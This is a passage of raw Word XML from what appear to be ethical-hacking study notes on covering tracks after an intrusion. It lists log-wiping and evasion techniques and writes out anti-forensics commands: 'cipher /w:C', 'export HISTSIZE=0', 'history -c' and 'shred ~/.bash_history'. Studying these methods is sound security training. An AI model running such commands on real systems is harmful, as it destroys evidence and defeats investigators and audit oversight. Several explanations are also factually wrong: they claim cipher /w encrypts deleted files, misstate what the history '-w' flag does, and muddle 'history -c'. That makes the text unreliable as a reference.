            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="7DE9B518" w14:textId="77777777" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>cipher.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="401F3FBA" w14:textId="09D5604B" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="007C0611">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Windows shell command)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09DCA089" w14:textId="3A7F1BD7" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r w:rsidRPr="007C0611">
              <w:t>Cipher.exe is an in-built Windows command-line tool that can be used to securely delete a chunk of data by overwriting it to prevent its possible recovery. This command also assists in encrypting and decrypting data in NTFS partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0611" w14:paraId="111EBED7" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="14388AFC" w14:textId="7165669C" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.g</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="58389A38" w14:textId="77777777" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E814AC9" w14:textId="760AF39E" w:rsidR="007C0611" w:rsidRPr="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r>
              <w:t>To use Cipher, simply enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007C0611">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cipher</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007C0611">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>/w:</w:t>
            </w:r>
            <w:r w:rsidRPr="007C0611">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="007C0611">
              <w:t>Here, we are encrypting the deleted files on the C: drive. You can run this utility on the drive, folder, or file of your choice.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007C0611" w14:paraId="6E673F4D" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="26D354A4" w14:textId="5CAA37E2" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidR="00736CE4">
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:t>.h</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="1462EBA7" w14:textId="77777777" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F71181" w14:textId="6AE3DBC4" w:rsidR="007C0611" w:rsidRDefault="007C0611" w:rsidP="00C708F1">
            <w:r w:rsidRPr="007C0611">
              <w:t>When an attacker creates a malicious text file and encrypts it, at the time of the encryption process, a backup file is created. Therefore, in cases where the encryption process is interrupted, the backup file can be used to recover the data. After the completion of the encryption process, the backup file is deleted, but this deleted file can be recovered using data recovery software and can further be used by security personnel for investigation. To avoid data recovery and to cover their tracks, attackers use the Cipher.exe tool to overwrite the deleted files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C708F1" w14:paraId="70BAA237" w14:textId="77777777" w:rsidTr="00C708F1">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="4BAF34C4" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="1B88236A" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRDefault="00C708F1" w:rsidP="00C708F1">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50C355AD" w14:textId="77777777" w:rsidR="00C708F1" w:rsidRPr="001E0F42" w:rsidRDefault="00C708F1" w:rsidP="00C708F1"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02F66B6A" w14:textId="77777777" w:rsidR="0050130C" w:rsidRDefault="0050130C" w:rsidP="0050130C"/>
    <w:p w14:paraId="4870B61E" w14:textId="77777777" w:rsidR="0050130C" w:rsidRDefault="0050130C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="646825EF" w14:textId="428376C8" w:rsidR="00736CE4" w:rsidRPr="0050130C" w:rsidRDefault="00736CE4" w:rsidP="0050130C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00065914">
        <w:lastRenderedPageBreak/>
        <w:t>Maintaining Access and Covering Tracks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clearing system logs (Linux)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1061"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="722"/>
        <w:gridCol w:w="2372"/>
        <w:gridCol w:w="7933"/>
      </w:tblGrid>
      <w:tr w:rsidR="00736CE4" w14:paraId="0D85625E" w14:textId="77777777" w:rsidTr="00BB74E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="1D13707D" w14:textId="5FB337CC" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:r>
              <w:t>134.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="0DCF36B7" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Clearing system logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6172D302" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>To remain undetected, the intruders need to erase all evidence of security compromise from the system. To achieve this, they might modify or delete logs in the system using certain log-wiping utilities, thus removing all evidence of their presence.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D15ED57" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Various techniques used to clear the evidence of security compromise are as follow:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3ECE84" w14:textId="77777777" w:rsidR="00736CE4" w:rsidRDefault="00736CE4" w:rsidP="00BB74E8">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1543"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Disable Auditing:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Disable the auditing features of the target system</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Clearing Logs:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Clears and deletes the system log entries corresponding to security compromise activities</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Manipulating Logs:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Manipulate logs in such a way that an intruder will not be caught in illegal actions</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Covering Tracks on the Network:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunnelling, and TCP parameters to cover tracks on the network.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Covering Tracks on the OS:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use NTFS streams to hide and cover malicious files in the target system</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Deleting Files:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Use command-line tools such as Cipher.exe to delete the data and prevent its future recovery</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>●</w:t>
            </w:r>
            <w:r w:rsidRPr="00FC0AAD">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Disabling Windows Functionality:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> Disable Windows functionality such as last access timestamp, Hibernation, virtual memory, and system restore points to cover tracks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB74E8" w14:paraId="6E7BDEC3" w14:textId="77777777" w:rsidTr="00BB74E8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="511B5D68" w14:textId="6CCD7489" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>134.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="21DB2D88" w14:textId="3EB793AF" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AA030C5" w14:textId="28762478" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r w:rsidRPr="00736CE4">
              <w:t xml:space="preserve">The BASH or Bourne Again Shell is a sh-compatible shell that stores command history in a file called bash history. You can view the saved command history using the more </w:t>
            </w:r>
            <w:r w:rsidRPr="00736CE4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">~/.bash_history </w:t>
            </w:r>
            <w:r w:rsidRPr="00736CE4">
              <w:t xml:space="preserve">command. This feature of BASH is a problem for hackers, as investigators could use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00736CE4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">bash_history </w:t>
            </w:r>
            <w:r w:rsidRPr="00736CE4">
              <w:t>file to track the origin of an attack and learn the exact commands used by the intruder to compromise the system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB74E8" w14:paraId="41EE5B24" w14:textId="77777777" w:rsidTr="00BB74E8">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="211DDFF2" w14:textId="16365A0A" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>134.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="1224F932" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F78A212" w14:textId="47868156" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>First of all, we need to set the number of commands to be saved to be set to zero:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>export</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>HISTSIZE=</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB74E8" w14:paraId="415FB7C7" w14:textId="77777777" w:rsidTr="00BB74E8">
        <w:trPr>
          <w:trHeight w:val="3320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="722" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FF99FF"/>
          </w:tcPr>
          <w:p w14:paraId="2E1D2EF9" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2372" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFCCFF"/>
          </w:tcPr>
          <w:p w14:paraId="309FD73B" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7933" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F278A5F" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>Next, we will clear the history:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>history</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t xml:space="preserve">This command is an effective alternative to the disabling history command; with </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>history</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-c</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t>, you have the convenience of rewriting or reviewing the earlier used commands.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> The </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-w</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> flag</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>will only delete the history of the current shell.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AF46442" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>To ensure the contents of the bash_history file is purged, use:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>shred</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/.bash_history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t>Give progress outpu</w:t>
            </w:r>
            <w:r>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
              <w:t>-z</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00280191">
              <w:t>add a final 0’s overwrite</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CB71AA8" w14:textId="77777777" w:rsidR="00BB74E8" w:rsidRDefault="00BB74E8" w:rsidP="00BB74E8">
            <w:r>
              <w:t>If you want to view the file (hopefully now shredded) enter:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">more </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/.bash_history</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t xml:space="preserve">(Or use </w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB74E8">
              <w:t>)</w:t>
            </w:r>
          </w:p>
